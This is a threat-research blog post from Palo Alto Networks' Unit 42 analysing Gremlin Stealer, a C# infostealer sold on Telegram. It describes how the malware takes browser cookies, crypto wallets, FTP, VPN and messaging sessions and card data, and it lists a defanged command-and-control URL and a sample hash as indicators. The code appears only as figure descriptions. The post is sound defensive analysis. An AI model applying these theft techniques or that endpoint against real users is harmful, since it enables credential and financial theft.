Malware

Gremlin Stealer: New Stealer on Sale in Underground Forum

Clock Icon 8 min read
Related Products
Advanced DNS Security iconAdvanced DNS SecurityAdvanced Threat Prevention iconAdvanced Threat PreventionAdvanced URL Filtering iconAdvanced URL FilteringAdvanced WildFire iconAdvanced WildFireCloud-Delivered Security Services iconCloud-Delivered Security ServicesCortex iconCortexCortex XDR iconCortex XDRCortex XSIAM iconCortex XSIAMUnit 42 Incident Response iconUnit 42 Incident Response

Executive Summary

Unit 42 researchers have identified new information-stealing malware written in C#, called Gremlin Stealer. This stealer’s authors have actively advertised it on a Telegram group since mid-March 2025.

This information-stealing malware exfiltrates data from its victims and uploads this information to its web server for publication. It can capture data from browsers, the clipboard and the local disk to steal sensitive data such as credit card details, browser cookies, crypto wallet information, File Transfer Protocol (FTP) and virtual private network (VPN) credentials.

Palo Alto Networks customers are better protected from Gremlin Stealer through our Network Security solutions and Cortex line of products, including Cortex XDR and XSIAM, Advanced WildFire, Advanced Threat Prevention, Advanced URL Filtering and Advanced DNS Security.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Cryptocurrency, Infostealers, Telegram

Malware Advertisement

Gremlin Stealer’s authors predominantly distribute it through a Telegram channel named CoderSharp, and the malware is undergoing active development.

Sales and Feature Advertisement on Telegram

The description of Gremlin Stealer asserts that the malware can steal data from a wide range of software. Figure 1 shows a Telegram post advertising Gremlin Stealer.

Screenshot of Telegram describing the features of "Gremlin Stealer," malware written in C#. The text lists capabilities like bypassing Chrome V20 protection, stealing data from various cryptocurrencies and browsers, as well as obtaining information from popular VPN services and PC specs. The message also mentions pricing information and a contact method. Timestamp shows 09:00 PM. Some of the information is redacted.
Figure 1. Telegram post advertising Gremlin Stealer.

Published Stolen Data

The group behind Gremlin Stealer claims to have uploaded vast amounts of data from its victims' machines to its server at 207.244.199[.]46. We assess this server is a configurable portal that comes with the sale of the malware.

Figure 2 shows a screenshot of Gremlin Stealer’s website login page.

Screenshot of login screen for Gremlin featuring a logo with a stylized mask above two text fields labeled for username and password respectively, and a login button labeled 'Войти'.
Figure 2. Gremlin Stealer login page.

The Gremlin Stealer website currently displays 14 files. The authors of the website describe these files as ZIP archives of stolen data from victims' machines, with options to delete or download the archives.

As indicated by the timestamps in Figure 3, Gremlin Stealer has been active since March 2025.

Dashboard interface of Gremlin featuring metrics such as MB of data stored alongside a series of cards displaying file data with sensitive information redacted.
Figure 3. Gremlin Stealer site showing entries for stolen victim data.

The web interface shown in Figure 3 also demonstrates the user interface of the backend infrastructure that comes with the purchase of this malware.

Technical Analysis

We have monitored Gremlin Stealer since we initially discovered it in March 2025. The functions of this stealer from Figure 1 are listed below.

Stealer functions

  • Basic features include:
    • Bypassing Chrome cookie V20 protection
    • Its build process does not download anything from the internet
  • Stealing functionality targets the following:
    • Popular browsers (e.g., cookies, passwords, cards, forms)
    • Popular cryptocurrencies
    • Clipboard data
    • FTP services
    • Steam (token and session data)
    • Popular VPN services
    • Telegram session data
    • Discord tokens (spot search by browsers)
    • Screenshots
    • Specified information from victim PC (e.g., BSID, HVID, RAM, CPU, GPU and IP address)

Bypass Chrome Cookie V20 Protection

The first feature advertised for Gremlin Stealer is that it bypasses Chrome’s cookie v20 protection. Figure 4 shows code snippets from a Gremlin Stealer sample viewed in dnSpy.

A screenshot of a computer screen displaying a code in an Integrated Development Environment (IDE). The code includes functions and the syntax is color-coded.
Figure 4. GetCookies function from a Gremlin Stealer sample shown in dnSpy.

This view shows the GetCookies function under a V20Collect class, which demonstrates how it bypasses Chrome's cookie V20 protection and obtains cookie-related information. This is a common technique that has been used by many information stealers. Google made changes to prevent the use of this technique, as detailed in the post, “Changes to remote debugging switches to improve security.”

Below, Figure 5 shows the writteCookieToFile function that writes stolen information into a text file under the LOCAL_APP_DATA folder for uploading to Gremlin's server. The text file contains the associated domain, name, value, path and expiration date for each of the cookies.

A screenshot of computer code written in C# programming language of the GetCookies function.
Figure 5. GetCookies function from a Gremlin Stealer sample in dnSpy.

Support for Chromium and Gecko Browsers

Gremlin Stealer checks for cookies and saved passwords from an extensive list of Chromium- and Gecko-based browsers and writes them into a file to be exfiltrated later.

Below, Figure 6 shows a code snippet from the ChromiumBrowsers function with a list of Chromium-based browsers it steals from. A RunBrowserv20 function is also called to handle newer cookie encryption called "v20" in Chromium-based browsers. There is also an equivalent function built to handle a list of Gecko-based browsers.

Screenshot of a computer program code snippet, showing functions written in C# language to handle application data paths for browsers like Google Chrome, Firefox, and Microsoft Edge. Several parts of the text are redacted with red bars.
Figure 6. ChromiumBrowsers function.

Cryptocurrency Wallet Stealer

Figure 7 shows that Gremlin Stealer checks for various cryptocurrency wallets and steals files from each directory.

A screenshot of computer code related to various cryptocurrencies like Bitcoin, Ethereum, and Litecoin.
Figure 7. List of cryptocurrency wallets targeted by Gremlin Stealer.

Taking Litecoin as an example, Gremlin Stealer checks for a related registry entry. If found, it copies the wallet.dat file to a temporary directory, as illustrated in Figure 8 below.

Screenshot of code written in C# LitecoinCore. The code includes operations involving the Windows Registry and file management related to 'LitecoinCore' wallet data.
Figure 8. Gremlin Stealer's Litecoin wallet stealing function.

As Figure 9 shows, Gremlin Stealer searches for files containing a list of domains associated with each cryptocurrency in specific folders and then duplicates these files for later exfiltration. It also creates a hash list representing the data to be exported.

Screenshot of a computer code snippet with much of the information redacted by red highlight.
Figure 9. Cryptocurrency-related domains that Gremlin Stealer searches for.

FTP Credentials

Gremlin Stealer attempts to steal FTP usernames and passwords. Figure 10 shows a decompiled code snippet for the TotalCommander FTP credential-stealing function.

A screenshot of code is written in C# and includes functions to create directories and handle files.
Figure 10. Gremlin Stealer code snippet for copying TotalCommander files.

VPN Credentials

Gremlin Stealer also obtains username, password and configuration files from popular VPN clients. Figure 11 shows a code snippet of the VPN stealing function.

Screenshot of a computer screen displaying code with highlighted syntax and some information redacted with red highlight.
Figure 11. Gremlin Stealer code snippet for stealing VPN data.

Telegram and Discord Sessions

Gremlin Stealer also targets data and session information from Telegram and Discord to upload to its configured server.

Figures 12 and 13 show code snippets for stealing information from Telegram and Discord.

A screenshot of a code snippet written in C# aiming to get the path of the Telegram desktop application if it is running, utilizing the Environment and Process classes.
Figure 12. Gremlin Stealer code snippet for Telegram data stealing function.
Screenshot of code written in C#, written to steal Discord sessions.
Figure 13. Gremlin Stealer code snippet for Discord sessions stealing function.

System Information

Gremlin Stealer creates a text file that contains system information (e.g., PC username, clipboard data, processor information and hardware ID), as shown below in Figure 14.

A screenshot of Gremlin Stealer code with syntax highlighting. It includes various system information commands and functions about the operating system, screen resolution, CPU, RAM, and more.
Figure 14. Gremlin Stealer code snippet for system information stealing function.

Credit Card Information Stealing

This malware also steals credit card information and sends the data to its server. Figure 15 shows a code snippet of Gremlin Stealer's function to steal credit card information.

Screenshot of a computer code snippet written in C# programming language used for encrypting and decrypting credit card information.
Figure 15. Gremlin Stealer code snippet for the function to steal credit card information.

Uploading the Victim’s Files to Gremlin Stealer's Server

Figure 16 shows that Gremlin Stealer creates a folder under LOCAL_APP_DATA to store the following in plain text files:

  • Saved passwords
  • Cookies
  • Autofill data
  • Screenshots
  • System information
  • Discord sessions
  • Telegram sessions
  • FTP and VPN credentials
  • Cryptocurrency wallets data
A screenshot displaying multiple lines of code. The code includes references to system information, cookies, VPN detection, and more. Some sections of the text are obfuscated with red blocks for privacy.
Figure 16. Gremlin Stealer sends all stolen data to a private server.

These texts are gathered into a ZIP archive, which is sent to its server through the URL hxxp[:]//207.244.199[.]46/index.php, shown in Figure 17.

Screenshot of code featuring a public string variable named 'myPrivateServer' set to a local IP address, highlighted in red.
Figure 17. Code snippet with URL for Gremlin Stealer server.

Gremlin Stealer sends this data using the Telegram bot shown in Figure 18. It uploads the stolen data to the server using a hard-coded Telegram API key.

Screenshot of code with a Telegram URL highlighted in a red box.
Figure 18. Gremlin Stealer code snippet with URL for Telegram bot.

Figure 19 shows a TCP stream of an HTTP POST request that Gremlin Stealer makes when sending stolen information to its server. It sends the information as a ZIP archive that contains all the data stolen from the victim's Windows host.

A screenshot showing an HTTP POST request with multipart data. An arrow points to a host IP address and a second red arrow points to the ZIIP file name that contains the public IP address of the victim host.
Figure 19. TCP stream of an HTTP POST request for a ZIP archive being uploaded to the Gremlin Stealer server.

Conclusion

Gremlin Stealer is new malware that has been active since March 2025. This malware searches for a variety of applications on a victim's Windows computer, and our code analysis confirms the specific applications targeted.

Stealers of this type are well-known entities in the threat landscape, and there are many approaches to protecting customers from these evolving attacks. Palo Alto Networks diligently monitors these campaigns, utilizing a range of static and dynamic techniques to detect and prevent them.

These methods include dynamic and behavioral detections, as well as more reactive signature or pattern-based solutions.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time.
  • Cortex XDR and XSIAM are designed to:
    • Prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
    • Protect against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4.
    • Detect post-exploit activity, including credential-based attacks, with behavioral analytics, through Cortex XDR Pro.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hash of the Gremlin Stealer sample analyzed for this article:

  • d1ea7576611623c6a4ad1990ffed562e8981a3aa209717065eddc5be37a76132

URLs:

  • hxxp[:]//207.244.199[.]46/index.php

Tags

Table of Contents

Related Articles

Related Resources

Enlarged Image

Get the latest news, invites to events, and threat alerts

Default Heading

Read the article Right Arrow

OSZAR »